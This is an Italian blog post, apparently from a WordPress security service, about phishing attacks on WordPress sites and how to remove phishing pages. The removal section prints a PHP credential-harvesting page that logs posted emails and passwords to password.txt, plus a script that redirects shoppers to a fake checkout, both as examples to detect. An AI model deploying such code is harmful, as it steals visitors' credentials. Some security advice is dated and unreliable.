Attacco phishing a WordPress – Come rimuovere il phishing dal sito

phishing wordpress attenzione

Sebbene le misure di sicurezza tecnica siano in costante miglioramento, il phishing di WordPress rimane uno dei modi più economici e semplici che gli hacker hanno a disposizione per accedere a informazioni sensibili.

Basta infatti fare clic su un link (veramente troppo facile) condiviso su Whatsapp, Messenger, Email e tanto altro per poter condividere informazioni private e divenire vittima di furto di identità.

Un recente rapporto sulla sicurezza di WordPress indica che gli amministratori dei siti WordPress stanno diventando il bersaglio di una campagna di phishing globale che prende di mira le credenziali degli utenti. È orchestrato da un collettivo criminale sconosciuto, il suo obiettivo principale sembra essere l’acquisizione di informazioni sensibili forzando i bersagli rivelandoli volontariamente.

Per sapere come proteggersi, bisogna capire cos’è un attacco di phishing, quali sono le tipologie e come si può riconoscerlo e rimuovere le pagine di phishing dal sito WordPress.

Se Continui a leggere, ti aiuteremo a evitare problemi di sicurezza derivanti da questo attacco.

Cos’è un attacco phishing?

Il phishing è una truffa online con cui gli hacker fingono di essere entità legittime per ingannare le vittime e indurle a condividere informazioni sensibili o installare malware.

Il “ phishing ” è un termine derivato da “pesca” poiché in entrambi i casi qualcuno lancia un’esca e aspetta che la persona o il pesce “abbocchi”. Spesso gli hacker lo fanno tramite e-mail dannose che sembrano provenire da mittenti attendibili e che includono un collegamento che apparentemente ti porta al sito Web di un azienda che conosci. Quando si inseriscono i dati, tali informazioni sensibili potrebbero essere soggette a furto.

Questi dati possono essere preziose informazioni private, come:

  • credenziali di accesso (e-mail e password),
  • coordinate bancarie (dati della carta di credito o credenziali per accedere alla propria banca)
  • dati personali (data di nascita, indirizzo o codice fiscale).

Il phishing è considerato un tipo di attacco di ingegneria sociale perché si basa su errori umani, non su errori hardware o software.

Il phishing è una tecnica di ingegneria sociale utilizzata dai criminali per ottenere informazioni riservate come nomi utente, password e dettagli delle carte di credito, “mascherandosi da comunicazione affidabile e legittima”.

Lo scenario di Phishing è generalmente associato alla possibilità di duplicare una pagina Web per far credere a un visitatore, che si trovi su un sito Web originale, piuttosto che un falso o duplicato di questo. L’inganno viene solitamente effettuato tramite e-mail e spesso queste e-mail contengono collegamenti a un sito Web falso che sembra quasi identico a un sito legittimo.

Una volta sul sito falso, gli utenti ignari vengono indotti a inserire i propri dati riservati, il che offre ai criminali ampio spazio per truffe da perpetrare con le informazioni ottenute.

esempio phishing bancaintesa

Esempio di recente attacco di phishing

 

Recentemente il Computer Emergency Readiness Team degli Stati Uniti ha emesso un avviso di campagne di phishing rivolte ai consumatori delle compagnie aeree.

Qui l’aggressore ha vestito i panni un’agenzia di viaggi o qualcuno all’interno di un’azienda. In questo tipo di attacco, ai destinatari viene comunicato che un’e-mail contiene un biglietto aereo o un biglietto elettronico, gli attacchi di phishing a tema aereo contengono collegamenti a siti di compagnie aeree falsificati, gli attori delle minacce personalizzano la pagina di phishing in modo da indurre le vittime a fornire informazioni commerciali. Tali messaggi di phishing fingono di essere inviati da un’agenzia di viaggi o da qualcuno all’interno dell’azienda bersaglio e includono un collegamento dannoso.

Da questo problema l’Italia è tutt’altro che esclusa, infatti dal rapporto Kaspersky sulla sicurezza 2021 è risultata essere il sesto paese al mondo per attacchi Bancari. Sia l’istituto INPS che l’Agenzia delle Entrate hanno dovuto segnalare agli utenti di tentativi di Phishing perpetrati in nome di questi istituti.

email phishing agenzia entrate
Phishing agenzia delle entrate

Quali informazioni cercano i phisher?

I phisher sono interessati a raccogliere informazioni che, per loro natura, sono private e/o confidenziali, specialmente se queste informazioni possono aiutarli a rubare la tua identità.

Si rivolge a una vasta gamma di informazioni, tra cui

  • Numeri di previdenza sociale.
  • Numeri di patente di guida.
  • Data e luogo di nascita.
  • Cognome della madre da nubile.
  • Numeri di conto.
  • PIN.
  • Nomi utente.
  • Le password.
  • Informazione personale.


Qualsiasi informazione riservata che i criminali possono utilizzare direttamente o rivendere.

Come funziona un attacco di phishing?

Un attacco di phishing di base tenta di indurre un utente a inserire dati personali o altre informazioni riservate. Circa 3,7 miliardi di persone inviano 269 miliardi di e-mail ogni giorno. Ciò lo rende il canale ideale per i criminali informatici. Immaginiamo se l’1% di queste e-mail fosse una truffa e l’1% di quella percentuale funzionasse. Ciò significherebbe che 26,9 milioni di tentativi di truffa al giorno avrebbero successo.

Puoi stare certo che più dell’1% delle e-mail che vengono inviate sono una truffa, ma vorremmo aiutare in modo che anche solo l’1% non arrivi.

Un attacco di phishing può avere un obiettivo particolare, ad esempio persone che utilizzano un prodotto specifico, oppure può essere generalizzato, rivolto al grande pubblico con finti concorsi e premi. In entrambi i casi, alle vittime viene chiesto di inserire i propri nomi, indirizzi e-mail e, in alcuni casi, password e coordinate bancarie.

Un’altra opzione è che l’e-mail contenga un allegato dannoso che ti viene chiesto di scaricare. In molti casi, il payload dannoso verrà nascosto all’interno di un documento Microsoft Word che richiede all’utente di abilitare il funzionamento delle macro. Quando provi ad aprire il documento, ti viene chiesto di aggiornare il software o di concedere determinate autorizzazioni per visualizzare correttamente il documento. E se accetti, probabilmente stai aprendo una grave breccia nella sicurezza da solo.

Esempi di truffe/attacchi/e-mail di phishing

 

Phishing WordPress

Sappiamo che WordPress alimenta oltre il 40% del Web ed è di gran lunga il più grande sistema di gestione dei contenuti (CMS). Pertanto, è un buon bersaglio per gli hacker per sfruttare le vulnerabilità di WordPress. Sapevi che le truffe di phishing di WordPress possono ingannare anche i consulenti WordPress?

Per coloro che gestiscono più siti WordPress, la loro e-mail è bombardata da e-mail provenienti da quei siti.

Anche il miglior utente di WordPress può essere ingannato quando l’e-mail è viene da qualcuno di familiare, come ad esempio un cliente, quindi simula quella che potrebbe ricevere regolarmente durante il lavoro.

La maggior parte degli aggressori utilizza un sito WordPress come calamita per distribuire malware tramite l’hack di phishing di WordPress. L’hacker utilizza il sito WordPress come copertura. Questa è la tattica più utilizzata, ma gli attori delle minacce possono anche utilizzare gli attacchi di phishing di WordPress contro gli amministratori del sito Web per ottenere l’accesso al sito per rubare quelle che in ambiente tecnico sono dette IPP (informazioni personali protette).

La maggior parte degli amministratori di WordPress non ha idea che sul proprio sito siano presenti pagine che compiono phishing. I file non sono inclusi nelle legittime pagine di phishing di WordPress e il sito Web non sembra essere diverso. Sono nascosti all’occhio. Pertanto, potresti scoprire che le pagine sono presenti solo quando ricevi una notifica da qualcuno che ha ricevuto l’e-mail con tale tentativo di phishing.

esempio phishing poste italiane
esempio phishing Poste Italiane

Attacchi di phishing ai siti WordPress


Questo attacco differisce dalle precedenti campagne di phishing perche si fa uso di un’e-mail progettata per assomigliare a una richiesta legittima di WordPress, in cui agli utenti viene richiesto di aggiornare immediatamente il proprio database.

Un nuovo attacco di phishing rivolto ai siti WordPress utilizza falsi messaggi di aggiornamento del database per causare seri problemi ai proprietari dei siti web. Secondo la ricerca eseguita dei nostri esperti WP, a differenza delle precedenti campagne di phishing, viene utilizzata un’e-mail progettata per assomigliare a una richiesta legittima di WordPress che chiede agli utenti di aggiornare immediatamente il proprio database.

Utilizzando opzioni di stile e carattere simili agli attuali aggiornamenti di WordPress, insieme a un piè di pagina che ricorda quello della società madre Automattic, i truffatori cercano di attirare gli utenti a fare clic sul pulsante “Aggiorna”. Successivamente, vengono chiesti loro nome utente e password, seguiti da una richiesta per il nome del sito Web e il nome dell’amministratore. Naturalmente, le e-mail includono più errori grammaticali nel corpo dell’e-mail e la menzione di una “scadenza” imminente, nessuna delle quali è coerente con WordPress o con i provider di hosting in generale.

 

Quando gli hacker raccolgono nomi utente, password e indirizzi di siti Web, hanno tutto ciò di cui hanno bisogno per deturpare il contenuto del sito e inviare malware agli utenti di questi siti web violati.

Inoltre, l’accesso completo ai siti WordPress consente agli attori malintenzionati di installare una backdoor su WordPress , consentendo loro di accedere al sito ogni volta che lo desiderano. Di conseguenza, le aziende potrebbero subire un improvviso calo del traffico sul sito o scoprire di essere state inserite nella lista nera dei motori di ricerca più diffusi.

Perché WordPress è così vulnerabile?

Con oltre 47mila plugin nella repository ufficiale di WordPress e altre migliaia disponibili su vari altri marketplace e siti, trovare quelli che funzionano bene è un compito arduo.

Trovare plug-in WordPress sicuri che non mettano in pericolo il tuo sito è un compito ancora più difficile a causa della natura complessa della sicurezza di WordPress e dei plug-in spesso enormi con migliaia di righe di codice.

Anche se non possiamo aiutarti a evitare ogni singolo plug-in errato. È necessario presentare il fatto crudo, che gran parte dell’attività di violazione di questi siti avviene tramite il plug-in. I plugin sono molto convenienti e collegano i sistemi e consentono loro di comunicare. Ma non tutti i plugin condividono gli stessi protocolli di sicurezza elevati. Gli hacker hanno bisogno di un anello debole per trovare un modo per accedere all’applicazione.

Non è che WordPress non avesse previsto che il rischio sarebbe aumentato. Il suo fondatore ne ha parlato già nel 2007. I siti WordPress hanno più di 82.000 incidenti di spam in più all’ora rispetto a un decennio fa. C’è una pletora di hack wordpress che sono molto diffusi in questi giorni. Alcuni dei più comuni sono:

  • l’attacco XSS di WordPress,
  • malware di reindirizzamento del malware di WordPress,
  • il malware di parole chiave giapponesi ,
  • l’hack farmaceutico di WordPress ,
  • l’attacco di brute force di WordPress e molti altri.

Tipi di truffe di phishing di WordPress

Esistono due modi di attaccare con il phishing che possono avere un impatto sugli utenti di WordPress. Innanzitutto, il tuo sito può essere compromesso in due modi:

  • gli hacker utilizzano il tuo sito WordPress per prendere di mira altri,
  • gli amministratori ricevono e-mail di phishing.

Lo scopo del phishing è ottenere informazioni riservate. Inizia con una sorta di comunicazione con i collegamenti. Sembra legittimo, ma questo singolo clic è sufficiente per far funzionare il “traino”. Questo collegamento porta a una pagina infetta, che potrebbe trovarsi sul tuo sito Web e tu non lo sai nemmeno.

Pagine phishing di WordPress

La maggior parte degli aggressori utilizza un sito WordPress come calamita per distribuire malware tramite phishing. L’hacker utilizza il sito WordPress come copertura. Questa è la tattica più utilizzata, ma gli attori delle minacce possono anche utilizzare tattiche di phishing contro gli amministratori di siti Web per ottenere l’accesso al sito per rubare PPI (informazioni personali protette).

La maggior parte degli amministratori di WordPress non ha idea che ci siano pagine di phishing sul sito. I file non sono inclusi nelle pagine legittime e il sito Web non sembra essere diverso. Sono nascosti, quindi potresti sapere che le pagine sono lì solo quando ricevi una notifica da qualcuno che ha ricevuto l’e-mail di phishing.

Email di phishing di WordPress

Una forma di attacco in cui gli amministratori del sito WordPress ricevono un’e-mail di phishing che assomiglia esattamente a una notifica che potrebbero aver ricevuto molte volte al giorno. Un tale tipo di “posta da phishing” può facilmente ingannare i principianti ma anche gli utenti professionisti.

Coloro che gestiscono più siti WordPress, hanno le e-mail è bombardata da e-mail provenienti da quei siti. Quindi, se lo confondiamo con un funzionario, sarebbe facile cliccarci sopra. Una cosa interessante che i truffatori faranno è inoltrare un’e-mail per sembrare una persona reale che ha inviato l’e-mail e ha bisogno dell’attenzione del lettore.

Questo è quando i destinatari devono guardare più da vicino. Fare domande come:

Sai chi è il mittente?

Il link che reindirizza all’URL ti è noto? Può anche essere un hack di reindirizzamento
È meglio fare domande e fare una rapida ricerca per vedere se questo è davvero legittimo. Anche il miglior utente di WordPress può essere compromesso quando l’e-mail è così familiare e sembra quella che potrebbe ricevere regolarmente.

Come trovare e rimuovere il phishing da WordPress?

Rimuovere le pagine di phishing da WordPress

Possiamo rimuovere le pagine di phishing dal sito WordPress, sia manualmente che utilizzando plugin di sicurezza. Questi plug-in possono trovare le infezioni da malware o gli script che portano al phishing.

Quindi, come trovarli e rimuoverli? È il codice.

Dovresti ispezionare il codice per capire se il tuo sito WordPress è stato violato. Queste pagine saranno indipendenti e sepolte all’interno del CMS.

Un modo per trovarli è per nome. Poiché una truffa di phishing è un tentativo di imitare il tuo sito per farlo sembrare legittimo, i nomi dei file lo tradiscono. I file conterranno elementi associati al tuo marchio, ma non saranno le pagine che hai creato.

Le pagine dei siti Web false sono progettate per sembrare autentiche. In molti casi, arriverai a una semplice pagina di accesso o di pagamento, poiché sono molto facili da ricreare per molti casi e possono essere efficaci nell’acquisizione di informazioni personali.

La scansione di ogni file sul sito non è un modo efficace per trovare queste pagine. Scarica tutti i file dal sito in locale per analizzarli uno per uno. I file che stai cercando saranno probabilmente raggruppati.

Spesso hanno un nome di directory che ha il nome dell’organizzazione.

Una volta trovati i file corrotti, cancellali, ma non ci sono solo le pagine.

Ecco alcuni esempi di attacchi di phishing sui siti. Di solito ci sono numerosi file, ma questo è il file che raccoglie i dati. I file possono essere offuscati o meno (oscurati intenzionalmente per rendere il codice ambiguo). Spesso c’è più di un file.

<html> <body> <?php $handle = fopen("password.txt", "a"); fwrite($handle,$_POST["Email"]); fwrite($handle,"\n"); fwrite($handle,$_POST["Passwd"]); fwrite($handle,"\n"); fwrite($handle,"\n"); fclose($handle) ; header("Location:https://www.[redacted].com/accounts/ServiceLoginAuth"); exit; ?> </body> </html>

Esiste anche un file correlato, password.txt, che raccoglie l’input della vittima di phishing.

<script>document.location="http://[redacted].com/Checkout"</script>

Il codice dannoso può essere incorporato nelle pagine del carrello degli acquisti, reindirizzando i clienti a un pagamento falso anziché a quello reale. Dovresti anche trovare un file chiamato password.txt, che è lì per raccogliere informazioni sull’hacking.

Troviamo spesso pagine di phishing con file .htaccess che bloccano l’indicizzazione da parte di motori di ricerca, scanner di malware e persino alcuni provider di hosting.

Trova e rimuovi il phishing con un plug-in

Sono disponibili numerosi plug-in di sicurezza per WordPress che possono scansionare e rilevare varie istanze di codice dannoso per te.

Rimuovi il sito dalla lista nera di Google

Google inserisce nella blacklist più di 10.000 siti ogni giorno. È difficile concentrarsi sulla riparazione del tuo sito Web compromesso quando non tutti i tuoi visitatori possono accedervi.

Se ricevi il messaggio di avviso della lista nera di Google quando apri il tuo sito web, è perché è stato inserito nella lista nera da Google, ha analizzato il tuo sito web e ha rilevato un comportamento dannoso, dovuto alla presenza di pagine di phishing sul tuo sito wordpress.

Questa grande copertina in rosso è progettata per impedire ai visitatori di accedere al tuo sito. La pagina di avviso rossa si collega a un’altra pagina che descrive i motivi per cui il sito Web è nella lista nera di Google, ma ecco un altro link per saperne di più.

  • Per rimuovere questo avviso di Google in modo da poter ripristinare il tuo sito web,
  • Rimuovi il phishing utilizzando i suggerimenti discussi in precedenza.
  • Quindi, informa Google di rivedere il tuo sito Web e rimuovere l’avviso nero.
  • Di solito, Google impiega 72 ore per rimuovere la lista nera.

Se il tuo sito web è stato coinvolto nel phishing, dovrai inviare una richiesta di riconsiderazione tramite Strumenti per i Webmaster di Google .

Accedi alla Search console di Google >> Sicurezza Azioni manuali. Quindi invia una recensione.

Tipi di attacchi di phishing
È facile presumere che praticamente tutti abbiano già ricevuto un attacco di phishing tramite e-mail o siano finiti su un sito Web sospetto. Esistono molti tipi di attacchi e gli hacker stanno diventando sempre più creativi, quindi dobbiamo essere consapevoli di alcuni dei nuovi metodi che utilizzano per distoglierci dal segnale di allarme prima che ci scoprano.

Di seguito abbiamo elencato alcuni dei tipi di attacchi più popolari utilizzati oggi. La principale differenza tra loro è il metodo utilizzato e l’obiettivo. In primo luogo, approfondiremo i diversi obiettivi che perseguono.

Spray and Pray


L’approccio spray and pray è il tipo meno completo di attacco di phishing. In esso, un messaggio di massa viene inviato a milioni di utenti. Questi messaggi mostrano sempre una sorta di urgenza, indicando che si tratta di un’e-mail “importante” della tua banca o di un servizio popolare o qualcosa del tipo “hai vinto un ultimo modello di iPhone. Richiedilo ora.

A seconda delle capacità tecniche dell’hacker, questi attacchi potrebbero non inviare falsi siti Web: alle vittime viene chiesto di rispondere all’attaccante tramite e-mail con informazioni sensibili. Di solito non sono inefficaci ma possono essere inviati a un numero enorme di indirizzi e-mail. Non è necessario che cadano troppe vittime perché l’attaccante lo consideri un successo.

Puoi infatti rivolgerti a qualsiasi tipo di obiettivo, da un’organizzazione specifica a un dipartimento o persona di quell’organizzazione per garantire la massima opportunità di apertura dell’e-mail e poter così ottenere più informazioni personali. Gli attacchi informatici di più alto profilo provengono solitamente da questo tipo di approccio.

Il messaggio sarà progettato per sembrare che qualcuno abbia bisogno di cambiare la tua password a causa di un problema con il servizio. di cui staresti usufruendo. In questo caso, il messaggio sembrerà legittimo (il più vicino possibile all’originale) e ti reindirizzerà a una pagina che assomiglierà anche a quella reale.

Questi attacchi sono più efficaci perché sono ben pianificati.

Le modalità possono variare a seconda dell’obiettivo. Gli obiettivi spray e pray richiedono uno sforzo minore rispetto allo spear phishing, ad esempio. Non devi investire molto per trovare un elenco di e-mail mirate, creare pagine landing personalizzate, ecc. Man mano che il phishing si è evoluto, vediamo sempre più metodi che non si limitano alle e-mail, ma includono anche siti Web o social network.

Attacco “pharming” alla cache

Questo metodo di phishing richiede all’hacker di creare un sito Web che ne impersoni uno reale e, sfruttando le vulnerabilità nel sistema dei nomi di dominio, abbina l’URL con l’ip dietro di esso. Infatti, gli aggressori potrebbero reindirizzare il traffico dal sito reale al sito falso. Questo è forse il tipo più pericoloso di phishing perché i record DNS non sono controllati dall’utente finale e ciò rende più difficile difendersi da questo attacco.

In questo tipo di attacco, gli hacker posizionano contenuti cliccabili su pulsanti legittimi. Ad esempio, un acquirente digitale potrebbe pensare di fare clic su un pulsante per effettuare un acquisto, ma invece scarica malware.

Diversi tipi di Phishing

Altri tipi di attacchi di phishing includono:

  • Clone phishing
  • Spoofing del dominio
  • Phishing HTTPS
  • Smishing
  • Spearphishing
  • Vishing
  • Phishing Watering Hole

Come riconoscere un attacco di phishing?

Se un’e-mail o un sito Web ti sembrano sospetti, ci sono alcuni dettagli che puoi esaminare. Sebbene alcune campagne di phishing siano create per apparire autentiche, ci sono sempre indizi che ci aiutano a rilevarle facilmente. Diamo un’occhiata ad alcuni dei dettagli che potrebbero indicare che sei vittima di un attacco di phishing e come riconoscere una truffa di phishing .

L’indirizzo del mittente

Controlla se hai mai ricevuto qualcosa dallo stesso mittente. Se l’aggressore è stato abbastanza furbo, maschererà l’indirizzo del mittente e la differenza potrebbe essere solo una lettera che potresti ignorare se non guardi da vicino.

Nomi di dominio con errori di ortografia

Se hai ricevuto un messaggio che sembra provenire dall’account ufficiale di un’azienda (qualcosa come “[email protected]”), conferma che l’indirizzo email di questa azienda è corretto. Sebbene il messaggio sembri legittimo, senza errori di ortografia o grammatica, con il formato corretto e il logo dell’azienda, potrebbe trattarsi di un account fraudolento.

Un indizio è verificare se il dominio è leggermente diverso dal solito (come l’aggiunta di un suffisso al nome di dominio). Ma soprattutto, i marchi più legittimi non ti chiederanno mai di fornire informazioni personali tramite e-mail.

Errori di ortografia e grammatica

Molti attacchi di phishing non sono molto ben pianificati, specialmente quelli del tipo “Spray and pray”, e i messaggi potrebbero contenere errori di ortografia e grammatica. È improbabile che i messaggi di organizzazioni su larga scala contengano tali errori. Pertanto, i messaggi scritti male sono un chiaro indicatore che il messaggio potrebbe non essere legittimo.

Allegati o link sospetti

È molto comune che i messaggi di phishing chiedano all’utente di fare clic su un collegamento che porta a un sito Web falso progettato per scopi dannosi. L’URL potrebbe sembrare legittimo, ma potrebbero esserci piccoli errori come lettere mancanti o sostituite.

Se il messaggio sembra strano, è sempre consigliabile prendersi qualche secondo per esaminare attentamente il collegamento, passandoci sopra con il mouse per vedere se l’indirizzo web è diverso da quello reale. Puoi sempre contattare il marchio utilizzando l’indirizzo e-mail pubblico o il numero di telefono prima di fare clic su qualsiasi cosa ritieni sospetta.

Sensazione di urgenza

Molti attacchi di phishing contengono messaggi che avvisano di problemi con il tuo account o problemi con un pagamento. Questo perché l’attaccante cerca di farti agire rapidamente senza pensare troppo. In questi casi è ancora più importante verificare l’indirizzo del mittente ei link contenuti nel messaggio.

Troppo bello per essere vero.

Siamo spiacenti di far scoppiare questa bolla, ma molto probabilmente qualsiasi messaggio che ti dice che hai vinto un coupon o un premio è un attacco di phishing. Siamo sicuri che richiederà più lavoro rispetto al semplice inserimento dei tuoi dati personali su un sito web, quindi sii molto più cauto e controlla bene tutti i dati.

Ehm, se scopri poi che te lo sei davvero guadagnato, congratulazioni!

Cosa dovresti fare se diventi vittima di un attacco di phishing?

Se sei stato vittima di un attacco di phishing, la prima cosa che devi fare è cambiare immediatamente tutte le tue password. Idealmente, le cambi tutte, non solo il servizio che l’attaccante avrebbe potuto colpire.

È allarmante quello che puoi fare con una singola credenziale di accesso. Prendi in considerazione l’utilizzo di un gestore di password in futuro, per ridurre il rischio e assicurarti di disporre di una soluzione antivirus con funzionalità di navigazione Web sicure installate e aggiornate.

Dovresti anche contattare il fornitore di servizi del quale è stato replicato il sito nell’attacco di phishing e seguire le sue istruzioni.

Come prevenire attacchi di phishing Web

Consigli per prevenire il phishing via e-mail:

  • Non rispondere mai a e-mail indesiderate
  • Non fare clic sui collegamenti direttamente dalle e-mail
  • Fai attenzione alle e-mail sospette
  • Elimina i messaggi che sono stati confermati come phishing
  • Non inviare le tue informazioni personali
  • Aggiorna spesso il software
  • Sii sempre cauto


Suggerimenti per prevenire il Web Phishing

  • Ignora i collegamenti nelle e-mail in cui ti chiedono di accedere al tuo account.
  • Accedi al tuo account separatamente tramite il browser in modo da sapere che stai accedendo all’account corretto.
  • Un altro modo per sapere se stai davvero entrando nel sito originale, è che l’indirizzo web della pagina dovrebbe iniziare con https e non http, come è consuetudine. La S finale ci dà un alto livello di sicurezza che stiamo navigando in una pagina web sicura.
  • È buona abitudine verificare il certificato digitale a cui si accede facendo doppio clic sul lucchetto della barra di stato nella parte inferiore del browser (attualmente alcuni browser possono visualizzarlo anche nella barra di navigazione in alto).
  • Non rispondere alle richieste di informazioni personali che arrivano via e-mail. Quando le aziende reali hanno bisogno di contattarci, hanno altri modi per farlo, di cui l’e-mail non sarà mai in parte a causa dei loro problemi di sicurezza intrinseci.
  • Se hai domande sulla legittimità di un dominio, chiama l’azienda a un numero che conosci in anticipo, non fare mai clic su di esso.
  • Consigliato anche prendere l’abitudine di esaminare gli addebiti effettuati sui propri conti o carte di credito per rilevare eventuali attività insolite.

Se hai ricevuto messaggi di questo tipo ignorali e insegna a chi lo ritiene opportuno le semplici forme di prevenzione citate.

Suggerimenti per proteggere il tuo sito WordPress

Anche se hai risolto il problema, ci sono possibilità che in futuro venga nuovamente violato dagli aggressori di phishing. Possiamo facilmente evitarlo adottando alcune misure di sicurezza di base. Questi sono collegamenti spam che devono essere rimossi dal raggiungere i tuoi utenti. Ma i truffatori cercano sempre di eludere la sicurezza, quindi è una buona idea aggiungere alcune protezioni aggiuntive.

Questi sono i 6 passaggi che puoi intraprendere oggi per proteggere il tuo o il tuo sito dagli attacchi di phishing:

  1. Mantieni aggiornato il tuo sito web
    Se il tuo sito è stato creato con WordPress, è molto importante aggiornarlo regolarmente. Spieghiamo perché. Forse il tuo motto è “se non è rotto, non aggiustarlo”. In molte situazioni, questa filosofia è encomiabile, ma non quando si tratta di WordPress o di software in generale. Gli aggiornamenti non solo apportano nuove funzionalità, ma risolvono anche i difetti di sicurezza. Saltare gli aggiornamenti significherebbe letteralmente che i problemi di sicurezza rimangono senza patch. Idealmente dovresti dedicare un’ora alla settimana all’aggiornamento dei tuoi siti web. In alternativa, se te lo puoi permettere, puoi assumere un’agenzia di gestione di WordPress per occuparti degli aggiornamenti.
  2. Utilizzare un certificato SSL
    Con un certificato SSL, il tuo sito web può sfruttare il protocollo HTTPS per trasferire in modo sicuro le informazioni tra il punto A e il punto B. Questo è fondamentale quando si trasferiscono informazioni sensibili, come i dati della carta di credito sulle pagine di pagamento e le informazioni di identificazione personale (PII) sui moduli di accesso e di contatto.

Ora è più facile che mai utilizzare HTTPS sul tuo sito web. I principianti dovrebbero iniziare parlandone con la loro società di hosting, richiedendo quali opzioni offrono. Esistono certificati SSL a pagamento e gratuiti.

  1. Applicare forti credenziali di accesso
    La password è uno dei problemi principali che dobbiamo tenere d’occhio quando stabiliamo la sicurezza sul tuo sito realizzato con WordPress. Molte volte siamo noi stessi a non prendere le precauzioni necessarie per mettere una password sicura per il nostro utente ma ci sono altre volte, specialmente quando permettiamo la registrazione dell’utente sul nostro sito, che sono loro che possono generare una falla di sicurezza con facile indovinare le password. Un nome utente e una password univoci renderanno difficile per gli hacker violare le tue credenziali.
  2. Utilizzare un plug-in di sicurezza
    Per WordPress, possiamo utilizzare molti plugin che ci semplificano ogni giorno. Alcuni mirano a migliorare il carico del web, SEO, social network. Ma sì, possiamo utilizzare strumenti di questo tipo anche per analizzare malware e attacchi di phishing. Diamo un nome ad alcuni dei principali. Questi plugin possono essere utilizzati per proteggerci da spam o file dannosi:

SecuPress

SecuPress è un altro plugin simile al precedente. È gratuito, anche se in questo caso va detto che le opzioni sono più limitate se non optiamo per la versione a pagamento. Ancora una volta abbiamo uno strumento che ci consente di eseguire una scansione alla ricerca di possibili minacce presenti sul nostro sito e quindi di poter correggere tali errori.

Va detto che non solo esegue analisi per malware, ma analizza anche altri aspetti del sito WordPress, come utenti o dettagli di accesso, eventuali componenti aggiuntivi o temi danneggiati. Ci mostra anche diversi errori.

malCure

Per molti, malCure è uno dei migliori plugin di sicurezza gratuiti per WordPress . È uno scanner di minacce completo. Ci consente di eseguire analisi per rilevare virus e minacce. Dobbiamo semplicemente installarlo, registrarci e possiamo iniziare a usarlo gratuitamente.

È un semplice complemento da utilizzare con il quale possiamo controllare la sicurezza della nostra pagina. La sua interfaccia è simile a quella di un antivirus tradizionale, dove possiamo vedere lo stato di avanzamento dell’analisi, così come il risultato una volta terminata. Tra le opzioni, possiamo eseguire un’analisi del database.

Avere un plugin di sicurezza non è negoziabile. Indipendentemente dal fatto che il tuo sito Web attiri milioni di visitatori o poche centinaia, gli hacker prendono di mira tutti i tipi di siti Web. Un buon addon per la sicurezza offre una protezione completa contro attacchi di phishing e bot.

  1. Impiegare i principi dei privilegi minimi
    Il principio del privilegio minimo contribuisce alla stabilità di WordPress. Quando l’ambito delle modifiche che un utente può apportare è limitato, le risorse di rete, i dati e i server sono più facili da monitorare e più affidabili. Limitare l’accesso all’intero WordPress impedisce inoltre che un possibile difetto in un’applicazione abbia un impatto su altri dispositivi o applicazioni, poiché anche le persone con accesso privilegiato al primo sistema non hanno accesso agli altri, il che riduce il rischio di violazione.

Esistono 6 ruoli utente su un sito Web WordPress: amministratore, editore, autore, collaboratore, abbonato e superadmin. Ogni ruolo ha un certo potere di cui si può abusare se non si assegnano correttamente i ruoli.

Il resto degli utenti ha un potere limitato di apportare modifiche al sito web. Assicurati che solo poche persone affidabili detengano il potere amministrativo.

Hai bisogno di aiuto per rimuovere le pagine di phishing da WordPress

Puoi analizzare ed eliminare il phishing manualmente. Ma come abbiamo detto prima, il codice dannoso o malevolo può essere presente ovunque sul sito. Ci vorrà un’eternità per trovarlo. Inoltre, ci sono possibilità di malware non trovabili, che spesso vengono nascosti in modo intelligente.

L’utilizzo di un plug-in di sicurezza garantisce un risultato migliore, ma ancora una volta non tutti i plug-in sono in grado di rilevare un attacco di phishing. Se vuoi trovare malware difficili da rilevare, La rimozione Malware WP Assistenza è la tua migliore opzione.

Gli hacker sono intelligenti e possono infettare i siti Web WordPress con nuovi tipi di malware o tentare di inserire codici complicati. Poiché la maggior parte degli scanner di sicurezza esegue la scansione di malware noti, non rileva malware nuovi e complessi. Abbiamo dedicato anni ad aiutare gli amministratori di WordPress a identificare e correggere gli attacchi di phishing dai siti web, quindi ci siamo guadagnati, i nostro 2 centesimi sull’argomento.